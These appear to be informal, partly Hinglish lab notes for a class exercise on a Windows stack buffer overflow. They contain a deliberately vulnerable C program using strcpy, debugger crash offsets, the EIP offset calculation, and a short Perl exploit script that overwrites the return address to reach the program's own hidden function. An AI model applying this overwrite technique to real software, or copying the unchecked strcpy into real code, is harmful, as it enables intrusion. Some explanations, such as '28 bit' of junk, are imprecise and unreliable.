g2s10 overflow

1. Buffer Overflow
2. It is the condition when the developer did not deployed proper exception handeling. Which let an attacker to change the EIP of the application with the address of any malicious code.
3. EIP is our return address which is very critical for the application. We as an attacker try to pass very much amount of data, which exceedes the limit of our buffer and results in overwriting the EIP(return address) of the application.
4.  
5. Requirement
6. 1. Windows OS
7. 2. OllyDBG
8. 3. Vulnerable Application --> Custom Based(we will create)
9. C compiler --> DevCPP 4.9.9.2
10. 4. Perl --> For creating an exploit
11.  
12.  
13.  
14. nmap -sS -sC -sV 192.168.0.1
15. 0 1 2 3 4
16. argc and argv[]
17.  
18. argc ---> number of arguments
19. argv[] -> contains the value of arguments
20. argv[0] -> nmap
21. argv[1] -> -sS
22. argv[2] -> -sC
23. argv[3] -> -sV
24. argv[4] -> 192.168.0.1
25.  
26. code.c
27. ======
28.  
29. #include <stdio.h>
30. #include <stdlib.h>
31. #include <string.h>
32.  
33. int overflow(char * s)
34. {
35. char buffer[10]; //this is our buffer
36. strcpy(buffer,s); //vulnerable code
37. return 0;
38. }
39.  
40. exploit()
41. {
42. printf("Buffer Overflow Chal gya....\n");
43. }
44.  
45. int main(int argc, char *argv[])
46. {
47. int a = 0;
48. printf("Aap log main wale function me ho.....\n");
49. overflow(argv[1]);
50. if(a == 1)
51. {
52. exploit();
53. }
54. else
55. {
56. printf("Pappu ka Buffer Overflow fail ho gya hai....\n");
57. }
58. return 0;
59. }
60. ==================
61.  
62. 00401316 |. E8 94FFFFFF CALL goku.004012AF
63.  
64. 00401316 ---> exploit
65.  
66. goku.exe LuciferTheMorningStarTheFirstFallenAngel
67. crash
68. Exception Offset: 6c:61:46:74 --> EIP
69.  
70. A --> 41
71.  
72. goku.exe AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
73. 41414141
74.  
75. Exception Offset: 41414141
76. A A A A
77.  
78. 00401316 ---> Normal Form
79. EIP Always read data in Little Endian Form
80. 00401316
81. 00 40 13 16
82. 16 13 40 00 ----> Little Endian Form
83.  
84. 1e66186a8e7f4a61ebaae3f46ae29b7520970ee1d605a28b3f55fe440002e44dd919a774edde630a8eed58831cd0004cea5b3b7f4ed9c2b45b39e62b258d87ba
85.  
86. goku.exe 1e66186a8e7f4a61ebaae3f46ae29b7520970ee1d605a28b3f55fe440002e44dd919a774edde630a8eed58831cd0004cea5b3b7f4ed9c2b45b39e62b258d87ba
87. Exception Offset: 35376239
88.  
89. 35376239
90. 35 37 62 39
91. 39 62 37 35
92.  
93.  
94.  
95. 9b75
96. 1e66186a8e7f4a61ebaae3f46ae29b7520970ee1d605a28b3f55fe440002e44dd919a774edde630a8eed58831cd0004cea5b3b7f4ed9c2b45b39e62b258d87ba
97.  
98. 1e66186a8e7f4a61ebaae3f46ae2 9b75
99.  
100. A --> 41
101. B --> 42
102. C --> 43
103. D --> 44
104. E --> 45
105.  
106. AAAAAAAAAAAAAAAAAAAAAAAAAAAABCDE
107. 42434445
108. 45444342
109.  
110. Exception Offset: 45444342
111.  
112. vegeta.pl
113. =========
114. my $junk="\x41" x 28; #28 bit ka junk data
115. my $eip="\x16\x13\x40\x00"; #Address of my exploit code
116. my $exploit=$junk.$eip; #concatinating the two strings
117. print "Buffer Overflow Chalne wala hai....\n";
118. system("goku.exe",$exploit);
119. print "Goku wale Buffer Overflow ko shadi mubarak ho.....\n";
120.  
121.  
122. https://ufile.io/s6f8v